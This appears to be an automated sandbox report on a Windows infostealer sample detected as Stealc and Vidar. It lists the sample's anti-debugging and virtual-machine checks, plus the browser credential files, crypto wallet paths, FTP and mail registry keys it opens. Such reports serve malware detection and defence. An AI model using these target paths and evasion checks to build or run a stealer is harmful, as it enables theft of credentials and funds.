Source: file.exe, file.exe, 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: KKECFIEB.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: KKECFIEB.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: KKECFIEB.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: KKECFIEB.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: KKECFIEB.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: KKECFIEB.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2321619295.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: KKECFIEB.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: KKECFIEB.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: KKECFIEB.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: KKECFIEB.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: KKECFIEB.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: KKECFIEB.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: KKECFIEB.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: KKECFIEB.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: KKECFIEB.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: KKECFIEB.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: KKECFIEB.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: KKECFIEB.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: KKECFIEB.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: KKECFIEB.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: KKECFIEB.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: KKECFIEB.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: KKECFIEB.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: KKECFIEB.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: KKECFIEB.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: KKECFIEB.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: KKECFIEB.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2321619295.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: KKECFIEB.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: KKECFIEB.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0y
Source: KKECFIEB.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: KKECFIEB.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-47131
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-48321
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-47134
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-47145
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-47185
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-47152

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6B5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008145C0 VirtualProtect ?,00000004,00000100,00000000

0_2_008145C0

Source: C:\Users\user\Desktop\file.exe

0_2_00829860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00829750 mov eax, dword ptr fs:[00000030h]

0_2_00829750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008278E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_008278E0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C68B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C68B1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00829600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00829600

Source: file.exe, file.exe, 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: *fProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00827B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00827980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00827980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00827850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00827850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00827A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00827A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2321619295.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2130002138.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2321619295.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2130002138.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	335 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
